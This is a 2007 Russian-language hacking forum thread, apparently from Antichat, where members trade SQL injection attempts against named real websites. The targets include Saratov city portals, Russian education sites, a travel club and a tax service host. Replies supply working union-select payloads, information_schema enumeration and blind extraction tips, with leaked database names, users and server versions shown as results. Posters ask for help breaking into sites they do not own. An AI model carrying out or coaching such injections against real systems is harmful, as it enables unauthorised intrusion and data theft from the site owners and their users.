Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. x.Elf

    x.Elf Elder - Старейшина

    Joined:
    24 May 2007
    Messages:
    34
    Likes Received:
    18
    Reputations:
    0
    http://www.usgs.gov/
    уже фильтрацию поставили гады ((
    тока два дня назад нашел ((
     
  2. Taylorith

    Taylorith Elder - Старейшина

    Joined:
    6 Sep 2006
    Messages:
    172
    Likes Received:
    11
    Reputations:
    0
    нашел сайтец при www.site.ru/id=1' при отправке такого запроса он мен выдает вот это

    Microsoft VBScript runtime error '800a000d'

    Type mismatch: '[string: "'"]'

    /support/includes/inc_news.asp, line 82

    я понял что это mssql но возможно ли тут инъекция, очень сложный вопрос так как я попробовал узнаь версию он мне выдал вот что
    Microsoft VBScript runtime error '800a000d'

    Type mismatch: '[string: "@@version--"]'

    /support/includes/inc_news.asp, line 82


    я попробовал множество вариантов , прочитал статьи и нашел что базы данных
    Vbscript впринципе невозможно взломать,... но надежда умирает последней может вы что то можете предложить... спасибо
    саму ссылку пока не даю так как , разъяснить надо поподробнее если уже идей не будет дам и ссылку... спасибо заранее
     
  3. Ping.Win

    Ping.Win New Member

    Joined:
    12 Aug 2007
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Объясните ламеру возможно ли это как-то использовать в своих целях? :)

    http://forums.saratov.ru/index.php?act=members&st=%20-1
    и
    http://forums.saratov.ru/ips_kernel/PEAR/Text/Diff3.php
     
  4. Taylorith

    Taylorith Elder - Старейшина

    Joined:
    6 Sep 2006
    Messages:
    172
    Likes Received:
    11
    Reputations:
    0
    я конечно плохо разбираюсь но попервой ссылке если ты поймешь что там написано , может это и ошибка , хотя врядли ничего по ней не сделаешь...
    а вот по второй ,это либо админ подлный дибил и с ошибкой фоурм, либо там инклуд (php инклуд) статьи есть на ачате.... хотя я плохо разбираюсь в инкоуде так что могу ошибится... просто сомнения из за того что ты не задал лишних параметров..
     
  5. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    Taylorith там строка задается. ничего не сделаешь
     
  6. Светлый

    Светлый Elder - Старейшина

    Joined:
    28 Jun 2007
    Messages:
    159
    Likes Received:
    47
    Reputations:
    46
    Раскручивай лучше отсюда http://saratov.ru/ads/click.cgi?account='
     
  7. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    Вот что я нашел по Саратову
    http://www.saratov.ru/gallery/?show=gal&id=-3+union+select+1,22222/*
    Таблицы не подобрал... :( пробовал mysql.user и ibf_members может руки не оттуда?..
     
  8. delay(0)

    delay(0) Member

    Joined:
    22 Nov 2006
    Messages:
    90
    Likes Received:
    41
    Reputations:
    6
    Code:
    http://www.saratov.ru/gallery/?show=gal&id=-1+union+select+1,2,выводится,4,5,6/*
    saratov
    gallery@localhost
    4.0.17
     
  9. x.Elf

    x.Elf Elder - Старейшина

    Joined:
    24 May 2007
    Messages:
    34
    Likes Received:
    18
    Reputations:
    0
    http://www.edu.ru/index.php?page_id=50&op=word&wid=-1'
    Выодит mysq еррор....начинаю перебор - он мне аццес денайед((
     
  10. x.Elf

    x.Elf Elder - Старейшина

    Joined:
    24 May 2007
    Messages:
    34
    Likes Received:
    18
    Reputations:
    0
    http://www.law.edu.ru/matlist.asp?themRub=20'&docType=11
    что можно сделать?
     
  11. delay(0)

    delay(0) Member

    Joined:
    22 Nov 2006
    Messages:
    90
    Likes Received:
    41
    Reputations:
    6
    Code:
    .php?rid=-1+union+select+1,2,3,column_name,5,6,7,8,9,1,2+from+information_schema.columns+where+table_name='users'+limit+1,1/*
    Code:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'users\' limit 1,1/*' at line 5
    Он ' фильтрует? Таблица users 100% существует.
     
  12. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    Code:
    http://www.edu.ru/index.php?page_id=50&op=word&wid=581 and substring(version(),1,1)=4
    там union заменяется на union% и у тя всегда будет ошибка синтаксиса. юзай посимвольный брут
     
    _________________________
  13. Taylorith

    Taylorith Elder - Старейшина

    Joined:
    6 Sep 2006
    Messages:
    172
    Likes Received:
    11
    Reputations:
    0
    http://www.turclubmai.ru/heading/155/index.php?group=asda&id_top_name='

    ни фига ниче не получается сделать пробовал найти количество столбоц , очень странно все короче... посомтрите пожлауйста... в че же я ошибаюсь


    ну к примеру делаю запрос такой
    http://www.turclubmai.ru/heading/155/index.php?group=asda&id_top_name=1'+union+select+1/*
    он мне выводит вот это

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' union select 1/*' at line 1
    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /www/vhosts/turclubmai.ru/html/heading/index.txt on line 46

    странно неправда ли , я короче таким образом дошел до 70 ...)) ни фига ничего а order by даже на 200 писал ошибку и даже на 1 ... не знаю короче помогите..
     
  14. halkfild

    halkfild Members of Antichat

    Joined:
    11 Nov 2005
    Messages:
    365
    Likes Received:
    578
    Reputations:
    313
    Taylorith
    http://www.turclubmai.ru/heading/155/index.php?group=asda&id_top_name=-111111111111+union+select+1,version()+/*

    5.0.24-standard
    db_turclubmai
    turclubmai@localhost
     
    _________________________
    #54 halkfild, 13 Aug 2007
    Last edited: 13 Aug 2007
    1 person likes this.
  15. Taylorith

    Taylorith Elder - Старейшина

    Joined:
    6 Sep 2006
    Messages:
    172
    Likes Received:
    11
    Reputations:
    0
    мля черт .... спасибо чел ) вот дурак не замтеил))
     
  16. sharoff

    sharoff Member

    Joined:
    5 Aug 2007
    Messages:
    25
    Likes Received:
    6
    Reputations:
    0
    Да, попробуй char() использовать, должно получиться.
     
  17. Nazaret2005

    Nazaret2005 Member

    Joined:
    11 Aug 2007
    Messages:
    25
    Likes Received:
    14
    Reputations:
    -9
    Хотел бы узнать если можно что то сделать с данной ошибкой,которую получаю на сайте,после добавки '

    Code:
    http://www.bezeqint.net/PageText.aspx?cc=010202020311'
     
  18. delay(0)

    delay(0) Member

    Joined:
    22 Nov 2006
    Messages:
    90
    Likes Received:
    41
    Reputations:
    6
    Таблица была в другой базе, br помог, за что ему спасибо. :)
     
  19. Taylorith

    Taylorith Elder - Старейшина

    Joined:
    6 Sep 2006
    Messages:
    172
    Likes Received:
    11
    Reputations:
    0
    прива вот покопался в одном сайте
    адрес вот такого типа http://www.site.ru/document.php?id=25609'&topic=тут топик естесно )

    потсавил ковычку и высветилось вот это


    Warning: fopen(/usr/data/www2.nalog.ru/htdocs/mw/root//secure.log) [function.fopen]: failed to open stream: Permission denied in /usr/data/www2.nalog.ru/htdocs/mw/libs/frontend_queries.php on line 15


    я знаком тока сос кулем... помогите заюзщать данную ошибку мне незнакомую...лучше скажите что это конкретно означает , к каким видам уязвимости относится и можно ли что нить сделать.....

    если идей больше не будет скажите скину сайт в ПМ.
     
  20. Basurman

    Basurman Elder - Старейшина

    Joined:
    10 Nov 2006
    Messages:
    363
    Likes Received:
    271
    Reputations:
    29
    А не страшно nalog.ru ломать? )
    ФНС РФ как никак )

    и посмотри на что он ругается: secure.log
    Если бы не ругался он, то тебя записали бы и потом пришли в гости. А так просто прав нет на запись и все
     
    #60 Basurman, 16 Aug 2007
    Last edited: 16 Aug 2007
Thread Status:
Not open for further replies.